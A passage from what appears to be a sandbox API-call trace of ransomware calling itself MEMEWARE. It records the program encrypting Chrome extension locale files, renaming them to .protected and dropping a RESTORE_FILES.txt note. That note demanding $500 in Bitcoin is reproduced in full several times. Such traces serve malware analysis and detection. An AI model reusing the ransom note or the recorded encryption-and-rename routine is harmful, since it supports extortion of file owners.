HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.380] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.380] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.380] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0080.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.380] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.380] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.381] lstrlenA (lpString="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") returned 684 [0080.381] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.381] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.381] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.382] CloseHandle (hObject=0x164) returned 1 [0080.382] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.382] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0080.382] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da") returned 141 [0080.382] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.382] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.382] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*") returned 143 [0080.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.383] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\.") returned 143 [0080.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.383] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.383] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\..") returned 144 [0080.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.383] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") 
returned 155 [0080.384] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.384] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.384] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.385] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.385] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.385] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.386] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.386] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.386] CloseHandle (hObject=0x168) returned 1 [0080.387] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected") returned 165 [0080.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.388] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.388] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.388] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0080.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.388] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.389] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.390] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.390] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.390] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.390] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.390] CloseHandle (hObject=0x164) returned 1 [0080.390] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.390] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.390] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de") returned 141 [0080.390] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.390] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.390] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*") returned 143 [0080.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.391] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\.") returned 143 [0080.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\..") returned 144 [0080.391] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.391] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.391] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.391] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.391] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.392] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.393] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.393] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.393] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc1, lpOverlapped=0x0) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc1, lpOverlapped=0x0) returned 1 [0080.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.394] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.394] CloseHandle (hObject=0x168) returned 1 [0080.394] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected") returned 165 [0080.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.395] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.395] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.396] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0080.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
